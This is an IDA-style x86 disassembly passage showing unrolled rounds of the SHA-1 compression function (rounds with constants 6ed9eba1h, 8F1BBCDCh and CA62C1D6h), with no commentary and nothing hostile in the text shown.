CODE:00402580 mov [esp+280h+var_2e0], edx CODE:00402584 xor eax, [esp+280h+var_4b0] CODE:0040258B xor [esp+280h+var_2e0], ebp CODE:0040258F rol eax, 1 CODE:00402591 xor [esp+280h+var_2e0], edi CODE:00402595 mov [esp+280h+var_4b0], eax CODE:0040259C add ebx, [esp+280h+var_2e0]

CODE:004025A0 ror edx, 2 CODE:004025A3 lea ebx, [ebx+eax+6ed9eba1h] CODE:004025AA mov [esp+280h+var_2e0], ebx CODE:004025AE mov eax, [esp+280h+var_4b8] CODE:004025B5 rol [esp+280h+var_2e0], 5 CODE:004025BA xor eax, [esp+280h+var_4cc] CODE:004025C1 add edi, [esp+280h+var_2e0] CODE:004025C5 xor eax, [esp+280h+var_4a4] CODE:004025CC mov [esp+280h+var_2e0], ecx CODE:004025D0 xor eax, [esp+280h+var_4ac] CODE:004025D7 xor [esp+280h+var_2e0], edx CODE:004025DB rol eax, 1 CODE:004025DD xor [esp+280h+var_2e0], ebp CODE:004025E1 mov [esp+280h+var_4ac], eax CODE:004025E8 add edi, [esp+280h+var_2e0] CODE:004025EC ror ecx, 2 CODE:004025EF lea edi, [edi+eax+6ed9eba1h] CODE:004025F6 mov [esp+280h+var_2e0], edi CODE:004025FA mov eax, [esp+280h+var_4b4] CODE:00402601 rol [esp+280h+var_2e0], 5 CODE:00402606 xor eax, [esp+280h+var_4c8] CODE:0040260D add ebp, [esp+280h+var_2e0] CODE:00402611 xor eax, [esp+280h+_temp_buffer] CODE:00402618 mov [esp+280h+var_2e0], ebx CODE:0040261C xor eax, [esp+280h+var_4a8] CODE:00402623 xor [esp+280h+var_2e0], ecx CODE:00402627 rol eax, 1 CODE:00402629 xor [esp+280h+var_2e0], edx CODE:0040262D mov [esp+280h+var_4a8], eax CODE:00402634 add ebp, [esp+280h+var_2e0] CODE:00402638 ror ebx, 2 CODE:0040263B lea ebp, [ebp+eax+6ed9eba1h] CODE:00402642 mov [esp+280h+var_2e0], ebp CODE:00402646 mov eax, [esp+280h+var_4b0] CODE:0040264D rol [esp+280h+var_2e0], 5 CODE:00402652 xor eax, [esp+280h+var_4c4] CODE:00402659 add edx, [esp+280h+var_2e0] CODE:0040265D xor eax, [esp+280h+var_4dc] CODE:00402664 mov [esp+280h+var_2e0], edi CODE:00402668 xor eax, [esp+280h+var_4a4] CODE:0040266F xor [esp+280h+var_2e0], ebx CODE:00402673 rol eax, 1 CODE:00402675 xor [esp+280h+var_2e0], ecx CODE:00402679 mov [esp+280h+var_4a4], eax CODE:00402680 add edx, [esp+280h+var_2e0] CODE:00402684 ror edi, 2 CODE:00402687 lea edx, [edx+eax+6ed9eba1h] CODE:0040268E mov [esp+280h+var_2e0], edx CODE:00402692 mov eax, [esp+280h+var_4ac] CODE:00402699 rol [esp+280h+var_2e0], 5 CODE:0040269E xor 
eax, [esp+280h+var_4c0] CODE:004026A5 add ecx, [esp+280h+var_2e0] CODE:004026A9 xor eax, [esp+280h+var_4d8] CODE:004026B0 mov [esp+280h+var_2e0], ebp CODE:004026B4 xor eax, [esp+280h+_temp_buffer] CODE:004026BB xor [esp+280h+var_2e0], edi CODE:004026BF rol eax, 1

CODE:004026C1 xor [esp+280h+var_2e0], ebx CODE:004026C5 mov [esp+280h+_temp_buffer], eax CODE:004026CC add ecx, [esp+280h+var_2e0] CODE:004026D0 ror ebp, 2 CODE:004026D3 lea ecx, [ecx+eax+6ed9eba1h] CODE:004026DA mov [esp+280h+var_2e0], ecx CODE:004026DE mov eax, [esp+280h+var_4a8] CODE:004026E5 rol [esp+280h+var_2e0], 5 CODE:004026EA xor eax, [esp+280h+var_4bc] CODE:004026F1 add ebx, [esp+280h+var_2e0] CODE:004026F5 xor eax, [esp+280h+var_4d4] CODE:004026FC mov [esp+280h+var_2e0], edx CODE:00402700 xor eax, [esp+280h+var_4dc] CODE:00402707 xor [esp+280h+var_2e0], ebp CODE:0040270B rol eax, 1 CODE:0040270D xor [esp+280h+var_2e0], edi CODE:00402711 mov [esp+280h+var_4dc], eax CODE:00402718 add ebx, [esp+280h+var_2e0] CODE:0040271C ror edx, 2 CODE:0040271F lea ebx, [ebx+eax+6ed9eba1h] CODE:00402726 mov [esp+280h+var_2e0], ebx CODE:0040272A mov eax, [esp+280h+var_4a4] CODE:00402731 rol [esp+280h+var_2e0], 5 CODE:00402736 xor eax, [esp+280h+var_4b8] CODE:0040273D add edi, [esp+280h+var_2e0] CODE:00402741 xor eax, [esp+280h+var_4d0] CODE:00402748 mov [esp+280h+var_2e0], ecx CODE:0040274C xor eax, [esp+280h+var_4d8] CODE:00402753 xor [esp+280h+var_2e0], edx CODE:00402757 rol eax, 1 CODE:00402759 xor [esp+280h+var_2e0], ebp CODE:0040275D mov [esp+280h+var_4d8], eax CODE:00402764 add edi, [esp+280h+var_2e0] CODE:00402768 ror ecx, 2 CODE:0040276B lea edi, [edi+eax+6ed9eba1h] CODE:00402772 mov [esp+280h+var_2e0], edi CODE:00402776 mov eax, [esp+280h+_temp_buffer] CODE:0040277D rol [esp+280h+var_2e0], 5 CODE:00402782 xor eax, [esp+280h+var_4b4] CODE:00402789 add ebp, [esp+280h+var_2e0] CODE:0040278D xor eax, [esp+280h+var_4cc] CODE:00402794 mov [esp+280h+var_2e0], ebx CODE:00402798 xor eax, [esp+280h+var_4d4] CODE:0040279F xor [esp+280h+var_2e0], ecx CODE:004027A3 rol eax, 1 CODE:004027A5 xor [esp+280h+var_2e0], edx CODE:004027A9 mov [esp+280h+var_4d4], eax CODE:004027B0 add ebp, [esp+280h+var_2e0] CODE:004027B4 ror ebx, 2 CODE:004027B7 lea ebp, [ebp+eax+6ed9eba1h] 
CODE:004027BE mov [esp+280h+var_2e0], ebp CODE:004027C2 mov eax, [esp+280h+var_4dc] CODE:004027C9 rol [esp+280h+var_2e0], 5 CODE:004027CE xor eax, [esp+280h+var_4b0] CODE:004027D5 add edx, [esp+280h+var_2e0] CODE:004027D9 xor eax, [esp+280h+var_4c8] CODE:004027E0 mov [esp+280h+var_2e0], edi

CODE:004027E4 xor eax, [esp+280h+var_4d0] CODE:004027EB xor [esp+280h+var_2e0], ebx CODE:004027EF rol eax, 1 CODE:004027F1 xor [esp+280h+var_2e0], ecx CODE:004027F5 mov [esp+280h+var_4d0], eax CODE:004027FC add edx, [esp+280h+var_2e0] CODE:00402800 ror edi, 2 CODE:00402803 lea edx, [edx+eax+6ed9eba1h] CODE:0040280A mov [esp+280h+var_2e0], edx CODE:0040280E mov eax, [esp+280h+var_4d8] CODE:00402815 rol [esp+280h+var_2e0], 5 CODE:0040281A xor eax, [esp+280h+var_4ac] CODE:00402821 add ecx, [esp+280h+var_2e0] CODE:00402825 xor eax, [esp+280h+var_4c4] CODE:0040282C mov [esp+280h+var_2e0], ebp CODE:00402830 xor eax, [esp+280h+var_4cc] CODE:00402837 xor [esp+280h+var_2e0], edi CODE:0040283B rol eax, 1 CODE:0040283D xor [esp+280h+var_2e0], ebx CODE:00402841 mov [esp+280h+var_4cc], eax CODE:00402848 add ecx, [esp+280h+var_2e0] CODE:0040284C ror ebp, 2 CODE:0040284F lea ecx, [ecx+eax+6ed9eba1h] CODE:00402856 mov [esp+280h+var_2e0], ecx CODE:0040285A mov eax, [esp+280h+var_4d4] CODE:00402861 rol [esp+280h+var_2e0], 5 CODE:00402866 xor eax, [esp+280h+var_4a8] CODE:0040286D add ebx, [esp+280h+var_2e0] CODE:00402871 xor eax, [esp+280h+var_4c0] CODE:00402878 mov [esp+280h+var_2e0], edx CODE:0040287C xor eax, [esp+280h+var_4c8] CODE:00402883 xor [esp+280h+var_2e0], ebp CODE:00402887 rol eax, 1 CODE:00402889 xor [esp+280h+var_2e0], edi CODE:0040288D mov [esp+280h+var_4c8], eax CODE:00402894 add ebx, [esp+280h+var_2e0] CODE:00402898 ror edx, 2 CODE:0040289B lea ebx, [ebx+eax+6ed9eba1h] CODE:004028A2 mov [esp+280h+var_2e0], ebx CODE:004028A6 mov eax, [esp+280h+var_4d0] CODE:004028AD rol [esp+280h+var_2e0], 5 CODE:004028B2 xor eax, [esp+280h+var_4a4] CODE:004028B9 add edi, [esp+280h+var_2e0] CODE:004028BD xor eax, [esp+280h+var_4bc] CODE:004028C4 mov [esp+280h+var_2e0], ecx CODE:004028C8 xor eax, [esp+280h+var_4c4] CODE:004028CF xor [esp+280h+var_2e0], edx CODE:004028D3 rol eax, 1 CODE:004028D5 xor [esp+280h+var_2e0], ebp CODE:004028D9 mov [esp+280h+var_4c4], eax CODE:004028E0 add 
edi, [esp+280h+var_2e0] CODE:004028E4 ror ecx, 2 CODE:004028E7 lea edi, [edi+eax+6ed9eba1h] CODE:004028EE mov [esp+280h+var_2e0], edi CODE:004028F2 mov eax, [esp+280h+var_4cc] CODE:004028F9 rol [esp+280h+var_2e0], 5 CODE:004028FE xor eax, [esp+280h+_temp_buffer]

CODE:00402905 add ebp, [esp+280h+var_2e0] CODE:00402909 xor eax, [esp+280h+var_4b8] CODE:00402910 mov [esp+280h+var_2e0], ebx CODE:00402914 xor eax, [esp+280h+var_4c0] CODE:0040291B or [esp+280h+var_2e0], ecx CODE:0040291F rol eax, 1 CODE:00402921 and [esp+280h+var_2e0], edx CODE:00402925 mov [esp+280h+var_4c0], eax CODE:0040292C add ebp, eax CODE:0040292E mov eax, ebx CODE:00402930 and eax, ecx CODE:00402932 or eax, [esp+280h+var_2e0] CODE:00402936 ror ebx, 2 CODE:00402939 lea ebp, [ebp+eax-70e44324h] CODE:00402940 mov [esp+280h+var_2e0], ebp CODE:00402944 mov eax, [esp+280h+var_4c8] CODE:0040294B rol [esp+280h+var_2e0], 5 CODE:00402950 xor eax, [esp+280h+var_4dc] CODE:00402957 add edx, [esp+280h+var_2e0] CODE:0040295B xor eax, [esp+280h+var_4b4] CODE:00402962 mov [esp+280h+var_2e0], edi CODE:00402966 xor eax, [esp+280h+var_4bc] CODE:0040296D or [esp+280h+var_2e0], ebx CODE:00402971 rol eax, 1 CODE:00402973 and [esp+280h+var_2e0], ecx CODE:00402977 mov [esp+280h+var_4bc], eax CODE:0040297E add edx, eax CODE:00402980 mov eax, edi CODE:00402982 and eax, ebx CODE:00402984 or eax, [esp+280h+var_2e0] CODE:00402988 ror edi, 2 CODE:0040298B lea edx, [edx+eax-70e44324h] CODE:00402992 mov [esp+280h+var_2e0], edx CODE:00402996 mov eax, [esp+280h+var_4c4] CODE:0040299D rol [esp+280h+var_2e0], 5 CODE:004029A2 xor eax, [esp+280h+var_4d8] CODE:004029A9 add ecx, [esp+280h+var_2e0] CODE:004029AD xor eax, [esp+280h+var_4b0] CODE:004029B4 mov [esp+280h+var_2e0], ebp CODE:004029B8 xor eax, [esp+280h+var_4b8] CODE:004029BF or [esp+280h+var_2e0], edi CODE:004029C3 rol eax, 1 CODE:004029C5 and [esp+280h+var_2e0], ebx CODE:004029C9 mov [esp+280h+var_4b8], eax CODE:004029D0 add ecx, eax CODE:004029D2 mov eax, ebp CODE:004029D4 and eax, edi CODE:004029D6 or eax, [esp+280h+var_2e0] CODE:004029DA ror ebp, 2 CODE:004029DD lea ecx, [ecx+eax-70e44324h] CODE:004029E4 mov [esp+280h+var_2e0], ecx CODE:004029E8 mov eax, [esp+280h+var_4c0] CODE:004029EF rol [esp+280h+var_2e0], 5 CODE:004029F4 xor 
eax, [esp+280h+var_4d4] CODE:004029FB add ebx, [esp+280h+var_2e0] CODE:004029FF xor eax, [esp+280h+var_4ac] CODE:00402A06 mov [esp+280h+var_2e0], edx

CODE:00402A0A xor eax, [esp+280h+var_4b4] CODE:00402A11 or [esp+280h+var_2e0], ebp CODE:00402A15 rol eax, 1 CODE:00402A17 and [esp+280h+var_2e0], edi CODE:00402A1B mov [esp+280h+var_4b4], eax CODE:00402A22 add ebx, eax CODE:00402A24 mov eax, edx CODE:00402A26 and eax, ebp CODE:00402A28 or eax, [esp+280h+var_2e0] CODE:00402A2C ror edx, 2 CODE:00402A2F lea ebx, [ebx+eax-70e44324h] CODE:00402A36 mov [esp+280h+var_2e0], ebx CODE:00402A3A mov eax, [esp+280h+var_4bc] CODE:00402A41 rol [esp+280h+var_2e0], 5 CODE:00402A46 xor eax, [esp+280h+var_4d0] CODE:00402A4D add edi, [esp+280h+var_2e0] CODE:00402A51 xor eax, [esp+280h+var_4a8] CODE:00402A58 mov [esp+280h+var_2e0], ecx CODE:00402A5C xor eax, [esp+280h+var_4b0] CODE:00402A63 or [esp+280h+var_2e0], edx CODE:00402A67 rol eax, 1 CODE:00402A69 and [esp+280h+var_2e0], ebp CODE:00402A6D mov [esp+280h+var_4b0], eax CODE:00402A74 add edi, eax CODE:00402A76 mov eax, ecx CODE:00402A78 and eax, edx CODE:00402A7A or eax, [esp+280h+var_2e0] CODE:00402A7E ror ecx, 2 CODE:00402A81 lea edi, [edi+eax-70e44324h] CODE:00402A88 mov [esp+280h+var_2e0], edi CODE:00402A8C mov eax, [esp+280h+var_4b8] CODE:00402A93 rol [esp+280h+var_2e0], 5 CODE:00402A98 xor eax, [esp+280h+var_4cc] CODE:00402A9F add ebp, [esp+280h+var_2e0] CODE:00402AA3 xor eax, [esp+280h+var_4a4] CODE:00402AAA mov [esp+280h+var_2e0], ebx CODE:00402AAE xor eax, [esp+280h+var_4ac] CODE:00402AB5 or [esp+280h+var_2e0], ecx CODE:00402AB9 rol eax, 1 CODE:00402ABB and [esp+280h+var_2e0], edx CODE:00402ABF mov [esp+280h+var_4ac], eax CODE:00402AC6 add ebp, eax CODE:00402AC8 mov eax, ebx CODE:00402ACA and eax, ecx CODE:00402ACC or eax, [esp+280h+var_2e0] CODE:00402AD0 ror ebx, 2 CODE:00402AD3 lea ebp, [ebp+eax-70e44324h] CODE:00402ADA mov [esp+280h+var_2e0], ebp CODE:00402ADE mov eax, [esp+280h+var_4b4] CODE:00402AE5 rol [esp+280h+var_2e0], 5 CODE:00402AEA xor eax, [esp+280h+var_4c8] CODE:00402AF1 add edx, [esp+280h+var_2e0] CODE:00402AF5 xor eax, [esp+280h+_temp_buffer] CODE:00402AFC 
mov [esp+280h+var_2e0], edi CODE:00402B00 xor eax, [esp+280h+var_4a8] CODE:00402B07 or [esp+280h+var_2e0], ebx CODE:00402B0B rol eax, 1

CODE:00402B0D and [esp+280h+var_2e0], ecx CODE:00402B11 mov [esp+280h+var_4a8], eax CODE:00402B18 add edx, eax CODE:00402B1A mov eax, edi CODE:00402B1C and eax, ebx CODE:00402B1E or eax, [esp+280h+var_2e0] CODE:00402B22 ror edi, 2 CODE:00402B25 lea edx, [edx+eax-70e44324h] CODE:00402B2C mov [esp+280h+var_2e0], edx CODE:00402B30 mov eax, [esp+280h+var_4b0] CODE:00402B37 rol [esp+280h+var_2e0], 5 CODE:00402B3C xor eax, [esp+280h+var_4c4] CODE:00402B43 add ecx, [esp+280h+var_2e0] CODE:00402B47 xor eax, [esp+280h+var_4dc] CODE:00402B4E mov [esp+280h+var_2e0], ebp CODE:00402B52 xor eax, [esp+280h+var_4a4] CODE:00402B59 or [esp+280h+var_2e0], edi CODE:00402B5D rol eax, 1 CODE:00402B5F and [esp+280h+var_2e0], ebx CODE:00402B63 mov [esp+280h+var_4a4], eax CODE:00402B6A add ecx, eax CODE:00402B6C mov eax, ebp CODE:00402B6E and eax, edi CODE:00402B70 or eax, [esp+280h+var_2e0] CODE:00402B74 ror ebp, 2 CODE:00402B77 lea ecx, [ecx+eax-70e44324h] CODE:00402B7E mov [esp+280h+var_2e0], ecx CODE:00402B82 mov eax, [esp+280h+var_4ac] CODE:00402B89 rol [esp+280h+var_2e0], 5 CODE:00402B8E xor eax, [esp+280h+var_4c0] CODE:00402B95 add ebx, [esp+280h+var_2e0] CODE:00402B99 xor eax, [esp+280h+var_4d8] CODE:00402BA0 mov [esp+280h+var_2e0], edx CODE:00402BA4 xor eax, [esp+280h+_temp_buffer] CODE:00402BAB or [esp+280h+var_2e0], ebp CODE:00402BAF rol eax, 1 CODE:00402BB1 and [esp+280h+var_2e0], edi CODE:00402BB5 mov [esp+280h+_temp_buffer], eax CODE:00402BBC add ebx, eax CODE:00402BBE mov eax, edx CODE:00402BC0 and eax, ebp CODE:00402BC2 or eax, [esp+280h+var_2e0] CODE:00402BC6 ror edx, 2 CODE:00402BC9 lea ebx, [ebx+eax-70e44324h] CODE:00402BD0 mov [esp+280h+var_2e0], ebx CODE:00402BD4 mov eax, [esp+280h+var_4a8] CODE:00402BDB rol [esp+280h+var_2e0], 5 CODE:00402BE0 xor eax, [esp+280h+var_4bc] CODE:00402BE7 add edi, [esp+280h+var_2e0] CODE:00402BEB xor eax, [esp+280h+var_4d4] CODE:00402BF2 mov [esp+280h+var_2e0], ecx CODE:00402BF6 xor eax, [esp+280h+var_4dc] CODE:00402BFD or 
[esp+280h+var_2e0], edx CODE:00402C01 rol eax, 1 CODE:00402C03 and [esp+280h+var_2e0], ebp CODE:00402C07 mov [esp+280h+var_4dc], eax CODE:00402C0E add edi, eax

CODE:00402C10 mov eax, ecx CODE:00402C12 and eax, edx CODE:00402C14 or eax, [esp+280h+var_2e0] CODE:00402C18 ror ecx, 2 CODE:00402C1B lea edi, [edi+eax-70e44324h] CODE:00402C22 mov [esp+280h+var_2e0], edi CODE:00402C26 mov eax, [esp+280h+var_4a4] CODE:00402C2D rol [esp+280h+var_2e0], 5 CODE:00402C32 xor eax, [esp+280h+var_4b8] CODE:00402C39 add ebp, [esp+280h+var_2e0] CODE:00402C3D xor eax, [esp+280h+var_4d0] CODE:00402C44 mov [esp+280h+var_2e0], ebx CODE:00402C48 xor eax, [esp+280h+var_4d8] CODE:00402C4F or [esp+280h+var_2e0], ecx CODE:00402C53 rol eax, 1 CODE:00402C55 and [esp+280h+var_2e0], edx CODE:00402C59 mov [esp+280h+var_4d8], eax CODE:00402C60 add ebp, eax CODE:00402C62 mov eax, ebx CODE:00402C64 and eax, ecx CODE:00402C66 or eax, [esp+280h+var_2e0] CODE:00402C6A ror ebx, 2 CODE:00402C6D lea ebp, [ebp+eax-70e44324h] CODE:00402C74 mov [esp+280h+var_2e0], ebp CODE:00402C78 mov eax, [esp+280h+_temp_buffer] CODE:00402C7F rol [esp+280h+var_2e0], 5 CODE:00402C84 xor eax, [esp+280h+var_4b4] CODE:00402C8B add edx, [esp+280h+var_2e0] CODE:00402C8F xor eax, [esp+280h+var_4cc] CODE:00402C96 mov [esp+280h+var_2e0], edi CODE:00402C9A xor eax, [esp+280h+var_4d4] CODE:00402CA1 or [esp+280h+var_2e0], ebx CODE:00402CA5 rol eax, 1 CODE:00402CA7 and [esp+280h+var_2e0], ecx CODE:00402CAB mov [esp+280h+var_4d4], eax CODE:00402CB2 add edx, eax CODE:00402CB4 mov eax, edi CODE:00402CB6 and eax, ebx CODE:00402CB8 or eax, [esp+280h+var_2e0] CODE:00402CBC ror edi, 2 CODE:00402CBF lea edx, [edx+eax-70e44324h] CODE:00402CC6 mov [esp+280h+var_2e0], edx CODE:00402CCA mov eax, [esp+280h+var_4dc] CODE:00402CD1 rol [esp+280h+var_2e0], 5 CODE:00402CD6 xor eax, [esp+280h+var_4b0] CODE:00402CDD add ecx, [esp+280h+var_2e0] CODE:00402CE1 xor eax, [esp+280h+var_4c8] CODE:00402CE8 mov [esp+280h+var_2e0], ebp CODE:00402CEC xor eax, [esp+280h+var_4d0] CODE:00402CF3 or [esp+280h+var_2e0], edi CODE:00402CF7 rol eax, 1 CODE:00402CF9 and [esp+280h+var_2e0], ebx CODE:00402CFD mov [esp+280h+var_4d0], eax 
CODE:00402D04 add ecx, eax CODE:00402D06 mov eax, ebp CODE:00402D08 and eax, edi CODE:00402D0A or eax, [esp+280h+var_2e0]

CODE:00402D0E ror ebp, 2 CODE:00402D11 lea ecx, [ecx+eax-70e44324h] CODE:00402D18 mov [esp+280h+var_2e0], ecx CODE:00402D1C mov eax, [esp+280h+var_4d8] CODE:00402D23 rol [esp+280h+var_2e0], 5 CODE:00402D28 xor eax, [esp+280h+var_4ac] CODE:00402D2F add ebx, [esp+280h+var_2e0] CODE:00402D33 xor eax, [esp+280h+var_4c4] CODE:00402D3A mov [esp+280h+var_2e0], edx CODE:00402D3E xor eax, [esp+280h+var_4cc] CODE:00402D45 or [esp+280h+var_2e0], ebp CODE:00402D49 rol eax, 1 CODE:00402D4B and [esp+280h+var_2e0], edi CODE:00402D4F mov [esp+280h+var_4cc], eax CODE:00402D56 add ebx, eax CODE:00402D58 mov eax, edx CODE:00402D5A and eax, ebp CODE:00402D5C or eax, [esp+280h+var_2e0] CODE:00402D60 ror edx, 2 CODE:00402D63 lea ebx, [ebx+eax-70e44324h] CODE:00402D6A mov [esp+280h+var_2e0], ebx CODE:00402D6E mov eax, [esp+280h+var_4d4] CODE:00402D75 rol [esp+280h+var_2e0], 5 CODE:00402D7A xor eax, [esp+280h+var_4a8] CODE:00402D81 add edi, [esp+280h+var_2e0] CODE:00402D85 xor eax, [esp+280h+var_4c0] CODE:00402D8C mov [esp+280h+var_2e0], ecx CODE:00402D90 xor eax, [esp+280h+var_4c8] CODE:00402D97 or [esp+280h+var_2e0], edx CODE:00402D9B rol eax, 1 CODE:00402D9D and [esp+280h+var_2e0], ebp CODE:00402DA1 mov [esp+280h+var_4c8], eax CODE:00402DA8 add edi, eax CODE:00402DAA mov eax, ecx CODE:00402DAC and eax, edx CODE:00402DAE or eax, [esp+280h+var_2e0] CODE:00402DB2 ror ecx, 2 CODE:00402DB5 lea edi, [edi+eax-70e44324h] CODE:00402DBC mov [esp+280h+var_2e0], edi CODE:00402DC0 mov eax, [esp+280h+var_4d0] CODE:00402DC7 rol [esp+280h+var_2e0], 5 CODE:00402DCC xor eax, [esp+280h+var_4a4] CODE:00402DD3 add ebp, [esp+280h+var_2e0] CODE:00402DD7 xor eax, [esp+280h+var_4bc] CODE:00402DDE mov [esp+280h+var_2e0], ebx CODE:00402DE2 xor eax, [esp+280h+var_4c4] CODE:00402DE9 or [esp+280h+var_2e0], ecx CODE:00402DED rol eax, 1 CODE:00402DEF and [esp+280h+var_2e0], edx CODE:00402DF3 mov [esp+280h+var_4c4], eax CODE:00402DFA add ebp, eax CODE:00402DFC mov eax, ebx CODE:00402DFE and eax, ecx CODE:00402E00 or 
eax, [esp+280h+var_2e0] CODE:00402E04 ror ebx, 2 CODE:00402E07 lea ebp, [ebp+eax-70e44324h] CODE:00402E0E mov [esp+280h+var_2e0], ebp

CODE:00402E12 mov eax, [esp+280h+var_4cc] CODE:00402E19 rol [esp+280h+var_2e0], 5 CODE:00402E1E xor eax, [esp+280h+_temp_buffer] CODE:00402E25 add edx, [esp+280h+var_2e0] CODE:00402E29 xor eax, [esp+280h+var_4b8] CODE:00402E30 mov [esp+280h+var_2e0], edi CODE:00402E34 xor eax, [esp+280h+var_4c0] CODE:00402E3B or [esp+280h+var_2e0], ebx CODE:00402E3F rol eax, 1 CODE:00402E41 and [esp+280h+var_2e0], ecx CODE:00402E45 mov [esp+280h+var_4c0], eax CODE:00402E4C add edx, eax CODE:00402E4E mov eax, edi CODE:00402E50 and eax, ebx CODE:00402E52 or eax, [esp+280h+var_2e0] CODE:00402E56 ror edi, 2 CODE:00402E59 lea edx, [edx+eax-70e44324h] CODE:00402E60 mov [esp+280h+var_2e0], edx CODE:00402E64 mov eax, [esp+280h+var_4c8] CODE:00402E6B rol [esp+280h+var_2e0], 5 CODE:00402E70 xor eax, [esp+280h+var_4dc] CODE:00402E77 add ecx, [esp+280h+var_2e0] CODE:00402E7B xor eax, [esp+280h+var_4b4] CODE:00402E82 mov [esp+280h+var_2e0], ebp CODE:00402E86 xor eax, [esp+280h+var_4bc] CODE:00402E8D or [esp+280h+var_2e0], edi CODE:00402E91 rol eax, 1 CODE:00402E93 and [esp+280h+var_2e0], ebx CODE:00402E97 mov [esp+280h+var_4bc], eax CODE:00402E9E add ecx, eax CODE:00402EA0 mov eax, ebp CODE:00402EA2 and eax, edi CODE:00402EA4 or eax, [esp+280h+var_2e0] CODE:00402EA8 ror ebp, 2 CODE:00402EAB lea ecx, [ecx+eax-70e44324h] CODE:00402EB2 mov [esp+280h+var_2e0], ecx CODE:00402EB6 mov eax, [esp+280h+var_4c4] CODE:00402EBD rol [esp+280h+var_2e0], 5 CODE:00402EC2 xor eax, [esp+280h+var_4d8] CODE:00402EC9 add ebx, [esp+280h+var_2e0] CODE:00402ECD xor eax, [esp+280h+var_4b0] CODE:00402ED4 mov [esp+280h+var_2e0], edx CODE:00402ED8 xor eax, [esp+280h+var_4b8] CODE:00402EDF or [esp+280h+var_2e0], ebp CODE:00402EE3 rol eax, 1 CODE:00402EE5 and [esp+280h+var_2e0], edi CODE:00402EE9 mov [esp+280h+var_4b8], eax CODE:00402EF0 add ebx, eax CODE:00402EF2 mov eax, edx CODE:00402EF4 and eax, ebp CODE:00402EF6 or eax, [esp+280h+var_2e0] CODE:00402EFA ror edx, 2 CODE:00402EFD lea ebx, [ebx+eax-70e44324h] CODE:00402F04 
mov [esp+280h+var_2e0], ebx
CODE:00402F08 mov eax, [esp+280h+var_4c0]
CODE:00402F0F rol [esp+280h+var_2e0], 5
CODE:00402F14 xor eax, [esp+280h+var_4d4]
CODE:00402F1B add edi, [esp+280h+var_2e0]
CODE:00402F1F xor eax, [esp+280h+var_4ac]
CODE:00402F26 mov [esp+280h+var_2e0], ecx
CODE:00402F2A xor eax, [esp+280h+var_4b4]
CODE:00402F31 or [esp+280h+var_2e0], edx
CODE:00402F35 rol eax, 1
CODE:00402F37 and [esp+280h+var_2e0], ebp
CODE:00402F3B mov [esp+280h+var_4b4], eax
CODE:00402F42 add edi, eax
CODE:00402F44 mov eax, ecx
CODE:00402F46 and eax, edx
CODE:00402F48 or eax, [esp+280h+var_2e0]
CODE:00402F4C ror ecx, 2
CODE:00402F4F lea edi, [edi+eax-70e44324h]
CODE:00402F56 mov [esp+280h+var_2e0], edi
CODE:00402F5A mov eax, [esp+280h+var_4bc]
CODE:00402F61 rol [esp+280h+var_2e0], 5
CODE:00402F66 xor eax, [esp+280h+var_4d0]
CODE:00402F6D add ebp, [esp+280h+var_2e0]
CODE:00402F71 xor eax, [esp+280h+var_4a8]
CODE:00402F78 mov [esp+280h+var_2e0], ebx
CODE:00402F7C xor eax, [esp+280h+var_4b0]
CODE:00402F83 xor [esp+280h+var_2e0], ecx
CODE:00402F87 rol eax, 1
CODE:00402F89 xor [esp+280h+var_2e0], edx
CODE:00402F8D mov [esp+280h+var_4b0], eax
CODE:00402F94 add ebp, [esp+280h+var_2e0]
CODE:00402F98 ror ebx, 2
CODE:00402F9B lea ebp, [ebp+eax-359d3e2ah]
CODE:00402FA2 mov [esp+280h+var_2e0], ebp
CODE:00402FA6 mov eax, [esp+280h+var_4b8]
CODE:00402FAD rol [esp+280h+var_2e0], 5
CODE:00402FB2 xor eax, [esp+280h+var_4cc]
CODE:00402FB9 add edx, [esp+280h+var_2e0]
CODE:00402FBD xor eax, [esp+280h+var_4a4]
CODE:00402FC4 mov [esp+280h+var_2e0], edi
CODE:00402FC8 xor eax, [esp+280h+var_4ac]
CODE:00402FCF xor [esp+280h+var_2e0], ebx
CODE:00402FD3 rol eax, 1
CODE:00402FD5 xor [esp+280h+var_2e0], ecx
CODE:00402FD9 mov [esp+280h+var_4ac], eax
CODE:00402FE0 add edx, [esp+280h+var_2e0]
CODE:00402FE4 ror edi, 2
CODE:00402FE7 lea edx, [edx+eax-359d3e2ah]
CODE:00402FEE mov [esp+280h+var_2e0], edx
CODE:00402FF2 mov eax, [esp+280h+var_4b4]
CODE:00402FF9 rol [esp+280h+var_2e0], 5
CODE:00402FFE xor eax, [esp+280h+var_4c8]
CODE:00403005 add ecx, [esp+280h+var_2e0]
CODE:00403009 xor eax, [esp+280h+_temp_buffer]
CODE:00403010 mov [esp+280h+var_2e0], ebp
CODE:00403014 xor eax, [esp+280h+var_4a8]
CODE:0040301B xor [esp+280h+var_2e0], edi
CODE:0040301F rol eax, 1
CODE:00403021 xor [esp+280h+var_2e0], ebx
CODE:00403025 mov [esp+280h+var_4a8], eax
CODE:0040302C add ecx, [esp+280h+var_2e0]
CODE:00403030 ror ebp, 2
CODE:00403033 lea ecx, [ecx+eax-359d3e2ah]
CODE:0040303A mov [esp+280h+var_2e0], ecx
CODE:0040303E mov eax, [esp+280h+var_4b0]
CODE:00403045 rol [esp+280h+var_2e0], 5
CODE:0040304A xor eax, [esp+280h+var_4c4]
CODE:00403051 add ebx, [esp+280h+var_2e0]
CODE:00403055 xor eax, [esp+280h+var_4dc]
CODE:0040305C mov [esp+280h+var_2e0], edx
CODE:00403060 xor eax, [esp+280h+var_4a4]
CODE:00403067 xor [esp+280h+var_2e0], ebp
CODE:0040306B rol eax, 1
CODE:0040306D xor [esp+280h+var_2e0], edi
CODE:00403071 mov [esp+280h+var_4a4], eax
CODE:00403078 add ebx, [esp+280h+var_2e0]
CODE:0040307C ror edx, 2
CODE:0040307F lea ebx, [ebx+eax-359d3e2ah]
CODE:00403086 mov [esp+280h+var_2e0], ebx
CODE:0040308A mov eax, [esp+280h+var_4ac]
CODE:00403091 rol [esp+280h+var_2e0], 5
CODE:00403096 xor eax, [esp+280h+var_4c0]
CODE:0040309D add edi, [esp+280h+var_2e0]
CODE:004030A1 xor eax, [esp+280h+var_4d8]
CODE:004030A8 mov [esp+280h+var_2e0], ecx
CODE:004030AC xor eax, [esp+280h+_temp_buffer]
CODE:004030B3 xor [esp+280h+var_2e0], edx
CODE:004030B7 rol eax, 1
CODE:004030B9 xor [esp+280h+var_2e0], ebp
CODE:004030BD mov [esp+280h+_temp_buffer], eax
CODE:004030C4 add edi, [esp+280h+var_2e0]
CODE:004030C8 ror ecx, 2
CODE:004030CB lea edi, [edi+eax-359d3e2ah]
CODE:004030D2 mov [esp+280h+var_2e0], edi
